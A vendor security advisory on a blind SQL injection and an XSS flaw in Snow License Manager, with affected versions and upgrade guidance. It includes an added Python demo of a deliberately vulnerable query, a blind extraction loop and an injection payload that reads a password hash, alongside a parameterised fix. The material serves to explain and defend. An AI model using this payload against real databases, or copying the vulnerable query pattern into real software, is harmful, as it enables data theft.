Snow Software recently detected two vulnerabilities impacting Snow License Manager (SLM) as part of our regular penetration testing of our products. At this time, Snow does not believe that either vulnerability has been exploited or that data has been exposed.
The first vulnerability is a blind SQL injection (CVE-2023-3864), which affects SLM On-Premises (also known as SLM Enterprise) and Service Provider Edition (SPE) from version 8.0.0 up to and including 9.30.1. It has a CVSS score of 7.2 and is rated high severity.
The second vulnerability is a cross-site scripting (XSS) issue (CVE-2023-3937), present in version 9.30.1 and earlier of both SLM On-Premises and SLM on SPE. It has a CVSS score of 4.8 and is rated medium severity.
Snow strongly recommends that all On-Premises customers with Snow License Manager 9.30.1 and earlier upgrade immediately. SPE customers should reach out to their Partner or Service Provider to discuss a mitigation plan. SPE partners have already been informed.
Description
During a routine penetration test conducted by our third-party security consultants, a SQL injection vulnerability was discovered in SLM On-Premises. When investigated further by our product security teams, it was determined that the vulnerability also impacted SLM for SPE.
If exploited, an SLM administrative user who is logged in with high-level privileges could use the web portal to trigger a SQL injection that would allow them to read, modify, or delete data in the database, affecting the confidentiality, integrity, or availability of the system. The impact is confined to the SQL database; in CVSS terms there is no scope change.
The second vulnerability, if exploited, allows a network user who is logged in with high-level privileges to trigger a cross-site scripting attack that could affect the confidentiality or integrity of the web portal. Triggering it requires user interaction.
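To make concrete what "blind" means here and why an injection reachable only by an already-privileged user still matters, the following is an added, generic example. It is not Snow's code, it says nothing about how SLM builds its queries, and every name in it is hypothetical: an in-memory SQLite database standing in for the product's backend, a made-up "licenses" search endpoint, and an invented `app_users` row with a fake hash. The attacker never sees query output, only whether the endpoint's count is non-zero, and that single bit per question is enough to read a value from a table the portal's authorization would never show. The same input is then sent to a parameterised version of the endpoint, where it is harmless.

```python
import sqlite3

# Constructed sample data standing in for an application database. The
# 'svc_admin' row and its hash are invented for this demo, not real values.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE licenses (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE app_users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO licenses (name) VALUES (?)",
                     [("Office",), ("CAD Suite",), ("DB Server",)])
    conn.execute("INSERT INTO app_users VALUES ('svc_admin', 'd1e8a70b5ccab1dc')")
    conn.commit()
    return conn

def count_licenses_vulnerable(conn, name_filter):
    """Hypothetical portal endpoint: how many licenses match a name filter.
    VULNERABLE: the filter is pasted into the statement text, so a user who
    may only *search* can run arbitrary SQL with the portal's database rights."""
    sql = "SELECT COUNT(*) FROM licenses WHERE name LIKE '%" + name_filter + "%'"
    return conn.execute(sql).fetchone()[0]

def count_licenses_fixed(conn, name_filter):
    """Hardened form: the filter travels as a bound parameter and cannot alter
    the statement's structure, whatever characters it contains."""
    sql = "SELECT COUNT(*) FROM licenses WHERE name LIKE ?"
    return conn.execute(sql, ("%" + name_filter + "%",)).fetchone()[0]

def extract_blind(oracle, username, length, alphabet="0123456789abcdef"):
    """Boolean-based blind extraction against an oracle that returns a count.
    One yes/no question per candidate character rebuilds a secret from another
    table. Returns None when no candidate is ever accepted, i.e. the endpoint
    did not execute the injected condition."""
    recovered = ""
    for pos in range(1, length + 1):
        hit = None
        for ch in alphabet:
            # The leading %' closes the LIKE literal ('%%' still matches every
            # row), AND appends our condition, and the trailing comment swallows
            # the remainder of the original statement. SQLite syntax; comment
            # and substring forms differ between database engines.
            payload = ("%' AND (SELECT substr(password_hash, {}, 1) FROM app_users "
                       "WHERE username = '{}') = '{}' -- ").format(pos, username, ch)
            if oracle(payload) > 0:
                hit = ch
                break
        if hit is None:
            return None
        recovered += hit
    return recovered

def demo():
    """Run the same attack against both endpoints; returns what each leaks."""
    conn = make_db()
    return {
        "vulnerable": extract_blind(lambda f: count_licenses_vulnerable(conn, f), "svc_admin", 16),
        "fixed": extract_blind(lambda f: count_licenses_fixed(conn, f), "svc_admin", 16),
    }

if __name__ == "__main__":
    results = demo()
    print("vulnerable endpoint leaks:", results["vulnerable"])
    print("parameterised endpoint leaks:", results["fixed"])
```

The point for defenders is that the authorization check on the portal is irrelevant once the statement text is attacker-controlled: the injected subquery runs with whatever rights the application's database account holds, which is why the advisory rates confidentiality, integrity and availability as all affected even though the caller is already an administrator.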
Remediation
For SLM On-Premises, customers are encouraged to upgrade to SLM v9.30.2 or later releases. If you currently have automatic updates through the Snow Update Service, please check to ensure that the upgrade has been completed.
For customers with SLM on SPE, your partners have already been notified and we’ve provided remediation guidance accordingly. Feel free to reach out to your partner for further information.
If you have any questions, please raise a ticket with Snow Support. Additional updates or information regarding this security update will be shared in this thread, if needed.